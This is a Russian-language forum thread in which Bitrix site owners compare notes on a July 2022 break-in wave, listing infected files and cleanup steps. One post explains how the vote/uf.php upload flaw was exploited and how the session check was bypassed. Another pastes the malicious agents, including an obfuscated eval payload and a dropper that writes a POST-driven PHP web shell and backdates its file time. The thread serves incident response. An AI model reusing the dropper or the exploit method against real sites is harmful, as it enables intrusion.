Со старого сервака можно воспользоваться экспортом ИБ, он восстановит структуру но естественно последних товаров не будет.
07.07.2022 09:49:36
Со старого сервака можно воспользоваться экспортом ИБ, он восстановит структуру но естественно последних товаров не будет.
|
|
|
|
08.07.2022 11:46:12
Илья,
я так понимаю поиск бэкдоров ничего не нашел ... тогда дырку надо самому искать если повезёт - дату изменения файлов злоумышленник не изменит обратно, тогда можно по дате изменения в логах глянуть какой файл "дёрнули" и уже в нём поискать бэкдор если не повезёт, то сложнее - писать анализатор изменившихся файлов и запускать его почаще (в принципе в Вашем случаем можно на эти два файла и "ловить", тогда можно почаще "дёргать" "ловилку") как только изменение будет "поймано" - анализ логов за последний период запуска "ловилки" в общем процесс довольно творческий ... могу помочь в свободное от работы время, но сразу предупреждаю - я не меценат |
|
|
|
08.07.2022 11:48:11
вообще судя по файлам - это не через vote, думаю это что то из более раннего |
|||
|
|
08.07.2022 12:08:01
1. лицензия куплена 2. не отключена 3. работает хотя для чего я вам это пишу? от вас навряд-ли я что-то полезное почерпну... |
|||||
|
|
08.07.2022 12:11:04
даты скорее всего "злоумышленник" поменял, логи по последним изменениям ничего страшного не показывают, про "ловилку" хорошая мысль, попробую вникнуть как ее можно применить, спасибо!!! |
|||
|
|
08.07.2022 13:29:39
У вас рабочая лицензия, все обновлено и при этом сайт ломают?
Странная ситуация. Что говорит об этом суппорт? |
|
|
|
08.07.2022 15:29:30
|
|||
|
|
08.07.2022 15:47:33
а вы в этом файле (bitrix/js/main/core/core.js) удаляли вот эту вот гадость?
|
|||||||
|
|
08.07.2022 16:16:00
Не знаю насколько у Вас тотже вирус, что был связан с уязвимостью vote.
Я по исходникам накопал следующее кому интересно. Атака была на файл uf.php с определенной структурой В параметрах структуры был определен класс CFileUploader. Именно он и создавался из строки а потом проверялся на instanceOf Connector. Да ошибка выводилась. Но был вызван конструктор CFileUploader Зачем битрикс делал логику загрузки на конструкторе - ума не приложу. Таким макаром загружалась папка в upload/tmp/ и на событии onFileIsStarted прпатчивался агент, который и создавал бэкдур putin_hui...php Как детально не могу сказать, но мне удалось воспроизвести загрузку файла на потенциально уязвимой машине. Патч битров заключался в использовании функции is_a , которая не создает объект а проверяет его наличие. По идее если гдето остался аналогичный вариант подгрузки то загрузить нефиг делать, но я надеюсь Ребята из битрикса знают что делают и дырок нигде нет )))). Рефлексия , конечно дело хорошее но мне кажется на публичке разрешать это использовать както не айс. Мало того в коде проверки проверяется актуальность сессии с помошью функции check_bitrix_sessid() Но эта функция обходится на раз два с помощью опятьже открытого скрипта tools/composite_data.php Тут инфа по серверу, для чего делать его открытым не знаю. Кстати этот скрпит доступен на всех обновленных машинах. |
|
|
|
08.07.2022 16:18:48
/bitrix/components/bitrix/main.file.input/main.php /bitrix/components/bitrix/main.file.input/set_list.php Второго файла вероятно не будет, а в первом - мишура для отвлечения внимания (основа - код из file.php), вызов system() в конструкторе с параметром из заголовка запроса + создание объекта данного класса после определения класса. Наличие данного файла не предполагается в ядре |
|||
|
|
08.07.2022 16:24:47
но у меня немножко другой вирус.... и где искать концы непонятно.... |
|||
|
|
08.07.2022 17:55:43
дата изменения этой папки как-раз на момент перед взломом, один из файлов на месте, но дата как и у всех остальных в папке, а второго нет, видимо самоудалился... main.php не стал удалять пока, очистил внутренности, будем посмотреть...... |
|||
|
|
08.07.2022 20:27:12
|
|||
|
|
09.07.2022 13:46:23
Тоже подверглись взлому. помимо упомянутого файла появились 2 агента
1. $arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4% 2. $fName = str_replace('/modules/main/classes/mysql', '', dirname(__FILE__)).'/admin/composite_seminarians.php'; $files = scandir(dirname($fName)); file_put_contents($fName, '<?php V47dc049a84b(@$_POST[\'c3a1e58\']); function V47dc049a84b($I018d087c){ @eval($I018d087c); } ?> '); touch($fName, filemtime(dirname($fName).'/'.$files[2])); |
|
|
|
09.07.2022 16:26:24
Что касается файлов
/bitrix/components/bitrix/main.file.input/main.php /bitrix/js/main/core/core.js prolog.php эти уязвимости были обнаружены на сайтах, которые крутятся на таймвебе, может кто-нибудь подтвердить или опровергнуть это? |
|
|
|
09.07.2022 19:32:24
У меня на 2х из 3х сайтах были обнаружены следы взлома. Все 3 - Timeweb
|
|
|
|
11.07.2022 11:06:10
опровергаю, у меня другой хостинг (не таймвеб),
но все три уязвимости присутствовали: /bitrix/components/bitrix/main.file.input/main.php /bitrix/js/main/core/core.js prolog.php |
|
|
|
11.07.2022 11:29:52
Такая же беда периодически встраивается
удалил руками. |
|
|
|
11.07.2022 12:59:37
Полагаю, хостинг не причем. У меня подобная проблема - на двух сайтах размещенных на Beget. Причем на двух из пяти сайтах. Может совпадение, но оба проблемных сайта используют студийные темы шаблоны, один Аспро:NEXT, второй: Электросила. Другие сайты, шаблоны которые были сверстаны и натянуты на битрикс - работают без проблем. Могу сказать, что чистка руками указанных файлов: bitrix/modules/main/include/prolog.php /public_html/bitrix/js/main/core/core.js не достаточна, уязвимость остается. После удаления вредоносного кодав указанных фалов, код встраивается снова. Вот к примеру, почистил указанные файлы, на через несколько дней Яндекс приостановил рекламные компании и прислал письмо:
Сложилось впечатление, что данный вредоносный код появляется раз в неделю, в выходные дни. Возможно так задумано. В понедельник - вторник очистил фалы. И всю неделю ежедневно проверял их на наличие мусора. В пятницу не было, а в воскресение получил письмо от Яндекса, проверил - в файел bitrix/modules/main/include/prolog.php - опять появился проблемный код. Как убрать уязвимость окончательно? |
|||||
|
|
11.07.2022 14:24:44
|
|||
|
|
12.07.2022 14:35:17
У нас такая же проблема. Появилось 1 июля, заметили только сейчас.
Шаблон сайта - ни один из перечисленных выше, хостинг - не таймвеб. Почистил prolog, core и удалил main.php. Агентов, упомянутых выше, нет. Файла /bitrix/tools/putin...php тоже нет Пока не знаю как сделать так, чтобы больше это не появлялось. |
|
|
|
12.07.2022 14:39:59
Обновить сайт до последней версии битрикс?
|
|
|
|
12.07.2022 15:13:39
Не всегда удается сделать это быстро. Нужно согласовывать это с заказчиком, тестировать, исправлять баги и т.д. |
||||
|
|
|||